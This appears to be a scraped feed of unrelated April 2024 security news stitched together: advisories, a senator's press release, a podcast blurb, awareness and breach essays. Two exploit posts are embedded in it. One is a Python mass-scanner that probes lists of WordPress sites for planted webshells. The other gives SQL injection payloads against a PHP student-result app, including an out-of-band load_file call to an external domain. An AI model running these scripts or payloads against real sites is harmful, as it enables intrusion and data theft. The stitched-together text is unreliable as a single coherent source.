Industry experts share how to implement comprehensive security strategies necessary to secure the software supply chain in Dark Reading's latest Tech Insights report.

Software supply chain attacks are relatively easy to conduct and have a significant payoff for attackers, so it's little wonder why they're top-of-mind for CISOs.

"This is especially the case if the vulnerable hardware or software has a high adoption across enterprise organizations," says ReliaQuest CISO Jeff Music.

While some software supply chain attacks, such as the ones involving MOVEit and SolarWinds, garner considerable attention, there are many software supply chain attacks occurring every day that don't get their moment in the spotlight. And no one beyond their victims ever hear about what happened.

But whether well-known or obscure, they create considerable risk for organizations.

For Dark Reading's latest Tech Insights report, "How Supply Chain Attacks Work and How to Secure Them," we interviewed experts who shared how to implement the comprehensive security strategies necessary to defend against these attacks. They include managing vendor risk, implementing security frameworks, conducting software composition analysis, and ensuring adequate DevSecOps practices are in place.

**Can't Blindly Trust Software**

In software supply chain attacks, malicious code or components are inserted into legitimate software applications or dependencies. The malicious software then enables attackers to infiltrate organizations that use those compromised systems.

Unfortunately, enterprises can't blindly trust their technology environments — from their end-user endpoints to third-party suppliers or the open-source components they rely on. These software supply chain attacks are insidious and have the power to compromise vast amounts of enterprise data and disrupt essential services across all business sectors.

In the case of MOVEit, for example, the attacks compromised the personal data of millions of people and affected more than 1,050 organizations, including those in the federal government, healthcare, education, finance, and insurance.

The stakes are high, and CISOs and security teams are grappling with these risks. Download a copy of our new report to learn from industry experts about how to implement the comprehensive security strategies necessary to defend against supply chain attacks.

**About the Author(s)**

An award winning writer and journalist, for more than 20 years George Hulme has written about business, technology, and IT security topics. He currently freelances for a wide range of publications, and is security blogger at InformationWeek.com.

Tips for Securing the Software Supply Chain

Ollama before 0.1.29 has a DNS rebinding vulnerability that can inadvertently allow remote access to the full API, thereby letting an unauthorized user chat with a large language model, delete a model, or cause a denial of service (resource exhaustion).

**Ollama DNS rebinding vulnerability**

High severity GitHub Reviewed Published Apr 8, 2024 to the GitHub Advisory Database • Updated Apr 8, 2024

GHSA-5jx5-hqx5-2vrj: Ollama DNS rebinding vulnerability

PRESS RELEASE

Washington, D.C. – Following a new report about how shambolic cybersecurity practices by a federal technology contractor enabled a massive hack of the U.S. government systems, Senator Ron Wyden, D-Ore., released draft legislation today to set mandatory cybersecurity standards, save taxpayers money, and break the anti-competitive lock-in effect caused by proprietary, walled-garden software. 

Multiple disastrous hacks of U.S. government systems have been enabled by poor cybersecurity practices by Big Tech companies providing services to the government. Most recently, the Department of Homeland Security Cyber Safety Review Board cited a “cascade” of errors by Microsoft, allowing Chinese hackers to breach federal email systems. 

The Secure and Interoperable Government Collaboration Technology Act would require the government to set new secure, open standards for collaboration software, which would also promote competition and save taxpayer dollars. 

“My bill will secure the U.S. government’s communications from foreign hackers, while protecting taxpayer wallets. Vendor lock-in, bundling, and other anticompetitive practices result in the government spending vast sums of money on insecure software,” said Wyden. “It’s time to break the chokehold of big tech companies like Microsoft on government software, set high cybersecurity standards and reap the many benefits of a competitive market.” 

While phone calls and email messages allow users to communicate no matter which mobile network or email provider they use, collaboration software is frustratingly walled off. Although video conferencing software like Zoom, Webex, and Microsoft Teams offer similar functionality, users cannot communicate across platforms. Similar barriers exist for chat services like Slack and document editors like Google Docs and Microsoft Office. As a result, agencies often become locked into expensive, insecure walled gardens that result in wasted time and taxpayer dollars as government employees switch constantly between different collaboration software products.

The Secure and Interoperable Government Collaboration Technology Act would –

Require the National Institute of Standards and Technology (NIST) to identify a set of interoperable standards, requirements, and guidance for each of these collaboration technology features, based on a set of required collaboration technology features identified by the General Services Administration (GSA).

Require that, to the fullest extent possible, the standards use end-to-end encryption and other technologies to protect U.S. government communications from foreign surveillance.

Require that collaboration technologies used by federal agencies enable those agencies to comply with federal record-keeping requirements.

Four years after NIST identifies the standards, require that collaboration technology procured by the federal government be capable of communicating using the NIST standards. 

Tasks the Department of Homeland Security with conducting cybersecurity reviews of collaboration technology products widely used by the federal government.

Create a GSA and Office of Management and Budget working group to produce biennial reviews of collaboration tech used by the federal government to suggest additions or improvements to the standards.

The draft legislation is endorsed by Accountable Tech, Demand Progress, Fight for the Future, Proton, Nym, the Matrix.org Foundation, and Cory Doctorow.

“Interoperability - the ability to plug something new into a technology, with or without permission from the manufacturer - is the key to defeating Big Tech,” said Doctorow. “This bill will require public funds to be spent on technology that anyone can fix, extend, or improve, preventing tech companies from locking in and ripping off the US government. The most amazing part is that this isn't already the way it's done.”

“Through this legislation, the federal government has the opportunity to set an example for workplaces, organizations, and institutions across the country on how to fundamentally improve online safety. Protecting digital communication with end-to-end encryption is essential to data privacy and security, and should be the standard across the board. Without it, messages can be intercepted and abused by hackers, repressive law enforcement agencies, foreign governments, or the company that owns the platform itself. Everyone from the former director of the NSA, to Big Tech companies, to human rights defenders working under authoritarian regimes have highlighted the life-saving importance of end-to-end encryption. The issue of data privacy has never been more urgent, and decisive lawmaker action is needed in this moment to bring about tech platform policies that truly center our privacy and needs as users—not corporate profits,” said Leila Nashashibi, campaigner at Fight for the Future. 

Wyden is accepting feedback on the draft legislation at \[email protected\]

The text of the draft bill is available here. 

A one-page summary of the bill is here.

Wyden Releases Draft Legislation to End Federal Dependence on Insecure, Proprietary Software

WordPress Travelscape theme version 1.0.3 suffers from an arbitrary file upload vulnerability.

    # Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload# Date: 2024-04-01# Author: Milad Karimi (Ex3ptionaL)# Category : webapps# Tested on: windows 10 , firefoximport sysimport os.pathimport requestsimport reimport urllib3from requests.exceptions import SSLErrorfrom multiprocessing.dummy import Pool as ThreadPoolfrom colorama import Fore, initinit(autoreset=True)error_color = Fore.REDinfo_color = Fore.CYANsuccess_color = Fore.GREENhighlight_color = Fore.MAGENTArequests.urllib3.disable_warnings()headers = {    'Connection': 'keep-alive',    'Cache-Control': 'max-age=0',    'Upgrade-Insecure-Requests': '1',    'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M;wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107Mobile Safari/537.36',    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',    'Accept-Encoding': 'gzip, deflate',    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',    'Referer': 'www.google.com'}def URLdomain(url):    if url.startswith("http://"):        url = url.replace("http://", "")    elif url.startswith("https://"):        url = url.replace("https://", "")    if '/' in url:        url = url.split('/')[0]    return urldef check_security(url):    fg = success_color    fr = error_color    try:        url = 'http://' + URLdomain(url)        check = requests.get(url +'/wp-content/themes/travelscape/json.php', headers=headers,allow_redirects=True, timeout=15)        if 'MSQ_403' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('MSQ_403.txt', 'a').write(url +'/wp-content/themes/travelscape/json.php\n')        else:            url = 'https://' + URLdomain(url)            check = requests.get(url +'/wp-content/themes/aahana/json.php', headers=headers,allow_redirects=True, verify=False, timeout=15)            if 'MSQ_403' in check.text:                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))                open('MSQ_403.txt', 'a').write(url +'/wp-content/themes/aahana/json.php\n')            else:                print(' -| ' + url + ' --> {}[Failed]'.format(fr))        check = requests.get(url + '/wp-content/themes/travel/issue.php',headers=headers, allow_redirects=True, timeout=15)        if 'Yanz Webshell!' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url +'/wp-content/themes/travel/issue.php\n')        else:            url = 'https://' + URLdomain(url)        check = requests.get(url + '/about.php', headers=headers,allow_redirects=True, timeout=15)        if 'Yanz Webshell!' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/about.php\n')        else:            url = 'https://' + URLdomain(url)        check = requests.get(url +'/wp-content/themes/digital-download/new.php', headers=headers,allow_redirects=True, timeout=15)        if '#0x2525' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('digital-download.txt', 'a').write(url +'/wp-content/themes/digital-download/new.php\n')        else:            print(' -| ' + url + ' --> {}[Failed]'.format(fr))            url = 'http://' + URLdomain(url)        check = requests.get(url + '/epinyins.php', headers=headers,allow_redirects=True, timeout=15)        if 'Uname:' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/epinyins.php\n')        else:            print(' -| ' + url + ' --> {}[Failed]'.format(fr))            url = 'https://' + URLdomain(url)        check = requests.get(url + '/wp-admin/dropdown.php',headers=headers, allow_redirects=True, verify=False, timeout=15)        if 'Uname:' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n')        else:            url = 'https://' + URLdomain(url)            check = requests.get(url +'/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers,allow_redirects=True, verify=False, timeout=15)            if 'Simple Shell' in check.text:                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))                open('dummyyummy.txt', 'a').write(url +'/wp-content/plugins/dummyyummy/wp-signup.php\n')            else:                print(' -| ' + url + ' --> {}[Failed]'.format(fr))    except Exception as e:        print(f' -| {url} --> {fr}[Failed] due to: {e}')def main():    try:        url_file_path = sys.argv[1]    except IndexError:        url_file_path = input(f"{info_color}Enter the path to the filecontaining URLs: ")        if not os.path.isfile(url_file_path):            print(f"{error_color}[ERROR] The specified file path isinvalid.")            sys.exit(1)    try:        urls_to_check = [line.strip() for line in open(url_file_path, 'r',encoding='utf-8').readlines()]    except Exception as e:        print(f"{error_color}[ERROR] An error occurred while reading thefile: {e}")        sys.exit(1)    pool = ThreadPool(20)    pool.map(check_security, urls_to_check)    pool.close()    pool.join()    print(f"{info_color}Security check process completed successfully.Results are saved in corresponding files.")if __name__ == "__main__":    main()

WordPress Travelscape Theme 1.0.3 Arbitrary File Upload

### Impact

When a authentificated request is made to `POST /store-api/account/logout`, the cart will be cleared, but the User won't be logged out. This affects only the direct store-api usage, as the PHP Storefront listens additionally on `CustomerLogoutEvent` and invalidates the session additionally. 

### Patches
The problem has been fixed with Shopware 6.6.1.0 and 6.5.8.8.

### Workarounds
When you are not able to update, you can install the latest version of the Shopware Security Plugin.


1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-31447

**Shopware Improper Session Handling in store-api account logout**

Moderate severity GitHub Reviewed Published Apr 8, 2024 in shopware/shopware • Updated Apr 8, 2024

**Package**

composer shopware/core (Composer)

**Affected versions**

\>= 6.3.5.0, < 6.5.8.8

\>= 6.6.0.0-rc1, < 6.6.1.0

**Patched versions**

6.5.8.8

6.6.1.0

\>= 6.3.5.0, < 6.5.8.8

\>= 6.6.0.0-rc1, < 6.6.1.0

**Impact**

When a authentificated request is made to POST /store-api/account/logout, the cart will be cleared, but the User won't be logged out. This affects only the direct store-api usage, as the PHP Storefront listens additionally on CustomerLogoutEvent and invalidates the session additionally.

**Patches**

The problem has been fixed with Shopware 6.6.1.0 and 6.5.8.8.

**Workarounds**

When you are not able to update, you can install the latest version of the Shopware Security Plugin.

**References**

*   GHSA-5297-wrrp-rcj7
*   shopware/shopware@5cc84dd
*   shopware/shopware@d29775a

Published to the GitHub Advisory Database

Apr 8, 2024

GHSA-5297-wrrp-rcj7: Shopware Improper Session Handling in store-api account logout

An issue was discovered in OFPMatch in parser.py in Faucet SDN Ryu version 4.34, allows remote attackers to cause a denial of service (DoS) (infinite loop).

**Ryu Infinite Loop vulnerability**

High severity GitHub Reviewed Published Apr 8, 2024 to the GitHub Advisory Database • Updated Apr 8, 2024

GHSA-p28x-hj68-7vfp: Ryu Infinite Loop vulnerability

This week on the Lock and Code podcast, we re-air an episode with guest Alec Muffett about online age verification.

_This week on the Lock and Code podcast…_

A digital form of protest could become the go-to response for the world’s largest porn website as it faces increased regulations: Not letting people access the site.

In March, PornHub blocked access to visitors connecting to its website from Texas. It marked the second time in the past 12 months that the porn giant shut off its website to protest new requirements in online age verification.

The Texas law, which was signed in June 2023, requires several types of adult websites to verify the age of their visitors by either collecting visitors’ information from a government ID or relying on a third party to verify age through the collection of multiple streams of data, such as education and employment status.

PornHub has long argued that these age verification methods do not keep minors safer and that they place undue onus on websites to collect and secure sensitive information.

The fact remains, however, that these types of laws are growing in popularity.

Today, Lock and Code revisits a prior episode from 2023 with guest Alec Muffett, discussing online age verification proposals, how they could weaken security and privacy on the internet, and whether these efforts are oafishly trying to solve a societal problem with a technological solution.

“The battle cry of these people have has always been—either directly or mocked as being—’Could somebody think of the children?’” Muffett said. “And I’m thinking about the children because I want my daughter to grow up with an untracked, secure private internet when she’s an adult. I want her to be able to have a private conversation. I want her to be able to browse sites without giving over any information or linking it to her identity.”

Muffett continued:

> “I’m trying to protect that for her. I’d like to see more people grasping for that.”
> 
> Alec Muffett

Tune in today to listen to the full conversation.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.**

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

 Porn panic imperils privacy online, with Alec Muffett (re-air): Lock and Code S05E08 

Investing in cybersecurity skills creates a safer digital world for everyone.

Source: Mopic via Alamy Stock Photo

COMMENTARY

The recent movie The Beekeeper begins with a cyberattack against a victim unfamiliar with the tactics and techniques attackers use in today's technology-driven world. The film's protagonist, Adam Clay, played by Jason Statham, then goes on a digital vendetta to find the responsible adversaries and ensure they can't continue extorting victims through common cybercrimes.

As much as our security teams would love to do threat hunting like Clay, we lack the physical physique and combat skills. And we know spreading awareness is a far more effective approach. Keeping the workforce fully educated can be a monumental task. However, it's the one thing that can entirely mitigate threats that target individuals. Some of the new ways of training involve old techniques.

**Adaptable > Repeatable**

In cybersecurity, technology operates predictably, but humans do not. As security professionals, we need help remembering this. The distinction underscores the need for person-led training during an employee's onboarding. Interactive training acknowledges human complexity, emphasizing the importance of adaptability in response to new threats and individual learning styles. Unlike automated training, person-led approaches can quickly adjust to address unique challenges and learner needs, making them more effective in promoting a deep understanding of security practices.

How quickly can your organization adapt to AI-based threats? Since human error accounts for almost 90% of all data breaches, organizations that prioritize their work and resources on risk will have a difficult time finding anything more important than an educated workforce. Train people with people. Use security champions if your team needs more resources or has time zone constraints. But overall, try to do something other than automate the process. 

**Build Storytellers**

Creating a solid cybersecurity culture involves enabling employees to share their personal experiences with security issues openly. Most people have learned their most valuable security lessons based on stories from other people. Sharing security stories may not come naturally to employees, and we need to teach and promote this behavior. During training, ask employees to discuss how cybersecurity has personally affected them in the past. Ask them about their familiarity with safe password hygiene or social media posts. This open-discussion initiative can help them feel at ease with the topic and understand that the organization encourages it. 

**Test the Response**

Implementing specific tests and monitoring employee behavior is essential to gauge the effectiveness of a security program. We know new employees will receive the fake text message from the CEO requesting gift card purchases. Try a simple smishing or phishing simulation with new employees to see if they proactively reach out after detecting the attempt. If employees actively communicate with each other about phishing campaigns, share security-related news, or discuss various security topics, it shows they have a sense of confidence and proper education in cybersecurity. This level of engagement and vigilance among staff members highlights the program's effectiveness in fostering a proactive security culture. When you see it, be quick to reward it. 

**Conclusion**

Unlike The Beekeeper, we won't be able to hunt down the adversaries and kick some butt. Instead, developing a robust security culture through awareness is our fight against cybercrime. Encouraging employees to share their experiences with security enables a sense of community and vigilance. Personalized training plays a critical role in this ecosystem. It's not just about delivering information; it's about tailoring the learning process to meet diverse needs and respond to emerging threats. We can assess how prepared our employees are to identify and counteract potential threats through testing.

The benefits of these strategies extend beyond the office walls. We're not merely educating our workforce; we're equipping them with knowledge that transcends the professional environment. This empowerment boosts their confidence, making them safer and more adept Internet users, at work and in their personal lives. By investing in their cybersecurity skills, we're contributing to a safer digital world for everyone.

The Fight for Cybersecurity Awareness

UP-RESULT version 0.1 2024 suffers from a remote SQL injection vulnerability.

    ## Title: upresult_0.1-2024 Multiple-SQLi## Author: nu11secur1ty## Date: 04/08/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download## Reference: https://portswigger.net/web-security/sql-injection## Description:The nid parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\qiccs55u6nnh6lxma520zou8ozusijm7da11orcg.tupaputka.com\\tuh'))+'was submitted in the nid parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.The attacker can get all information from the system by using thisvulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: nid (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: nid=145448807' or '1766'='1766' AND 2997=2997 AND 'IBFU'='IBFU    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: nid=145448807' or '1766'='1766';SELECT SLEEP(7)#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: nid=145448807' or '1766'='1766' AND (SELECT 3474 FROM(SELECT(SLEEP(7)))eAdm) AND 'ubZR'='ubZR    Type: UNION query    Title: MySQL UNION query (NULL) - 4 columns    Payload: nid=145448807' or '1766'='1766' UNION ALL SELECTNULL,NULL,CONCAT(0x716a767871,0x76504a4f6455624669506c6a484150727767554e66574d7856554875684368426b4f72794374496e,0x716b787071),NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/upresult_0.1-2024)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/04/upresult01-2024-multiple-sqli.html)## Time spent:00:15:00

UP-RESULT 0.1 2024 SQL Injection

By Daily Contributors
Today over at Resonance Security I am going to look at one of the more unusual ways in…
This is a post from HackRead.com Read the original post: The Legacy of a Security Breach

This article was authored and contributed by Keir Finlow-Bates, a passionate blockchain enthusiast and technologist.

Today over at Resonance Security I am going to look at one of the more unusual ways in which your approach to computer security can lead to an increase in public awareness of your company.

There are many motivations for starting a company: becoming wealthy, doing something interesting and useful, and leaving some kind of legacy or mark on history are three of the main ones that spring to mind.

About that legacy: imagine having the name of your corporation attached to a file representing one of the most significant hacks of the 21st century!

That’s quite notable, but probably not what the founders of one particular company were looking for with their startup.

****We won’t rock you****

In the middle of the 2000s, RockYou, Inc. was doing well as a widget-maker for social media companies like MySpace and Facebook. However, back in 2009, it suffered a data breach in which a hacker discovered an SQL database server with an unpatched ten-year-old bug, the database containing over 32 million usernames and passwords for user accounts.

That’s right — 32 million usernames, and their associated passwords. For comparison, that’s about 10% of the active monthly users that Facebook had at the time.

The passwords were stored in plain text.

****Mud on your face, big disgrace****

Not only did RockYou initially fail to notify their users, but it subsequently released a falsified official statement claiming that the breach was less severe than it was.

To be clear: it was a very, very serious breach.

A decade and a half ago, people were far worse at password security than they are now. Password managers were almost unheard of, for some unexplained bizarre reason some sites blocked the use of password managers for unspecified “security reasons”, and two-factor authentication was pretty much only affordable and available to business users.

Because people were told not to write down their passwords, this meant that most of the leaked credentials were being used on other websites. After all, who in their right mind is going to memorize twenty or thirty different random passwords? As a result, sites such as banks, online stores, health databases, social media, supposedly private online journals, and online games held accounts using the same passwords.

****The legacy****

For years the full list of RockYou passwords has been available to download by anyone. It is typically found in a file called rockyou.txt , and there are plenty of GitHub repositories out there where you can find it.

In Kali Linux, a Linux distribution designed and produced specifically for penetration testing, the RockYou text file is included during the installation by default.

****Conclusion****

Just imagine — with a little bit of security carelessness, you too can take your modestly successful company and in the process of destroying it, allow its name to live on forever.

Have we learned anything since 2009? Not always.

For example: in 2017 it was revealed that an old social media site called LiveJournal, dating back to the 90s (but still running to this day), suffered a breach in which 26 million unique usernames, email addresses, and plaintext passwords were extracted. It took them until 2019 to admit to the breach.

That’s right — passwords were still being stored in plaintext in 2017, and I would bet good money on there being more sites out are doing the same, even though we are a decade and a half on from the original RockYou breach.

I predict that the leakage of passwords will only end once we stop using passwords, and start using improved systems such as security keys and self-managed identity for our authentication systems.

In the meantime, you have to assume that any password you provide to a website will eventually be leaked, therefore:

*   use a password manager to generate long, random, unique passwords for your accounts,
*   protect access to the password manager with two-factor authentication, and
*   make sure the password you use for your password manager has never been used anywhere else.

****Post-script****

Don’t run off and look for a website that allows you to enter your password and see if it was ever revealed in a breach! I can guarantee it will be a phishing site. Instead, I recommend HaveIBeenPwned, where you can type in your email address, and retrieve a list of the companies and websites that have managed to leak your credentials to the dark web through bad security practices. Another option is the Resonance Data Leak Detector, which monitors if your credentials have been leaked 24/7 and automatically notifies you.

****About Resonance Security****

Resonance Security is a curated platform for end-to-end cybersecurity products and services. It functions as a concierge for your organization’s end-to-end cyber-security needs, aggregating valuable security offerings into one platform to spread awareness on what it takes to secure your technology stack end-to-end.

I’m Keir Finlow-Bates, often known as Blockchain Gandalf, and am primarily a blockchain researcher and inventor. I started on this journey in late 2010 by examining the original Bitcoin code, and have been obsessed with blockchain ever since.

I am also the author of two books on the topic: Move Over Brokers Here Comes The Blockchain, explaining blockchain, and Evil Tokenomics, illustrating through practical examples how web3 scams work. You can find more at my website: Thinklair.com

1.  The Forgotten Victims of Data Breach
2.  Solving the Cyber Security Problem: Mission Impossible
3.  Will good prevail over bad as bots battle for the internet?
4.  If a Cyber Security Report Falls in a Forest, Is Anyone Listening?

Tag

#git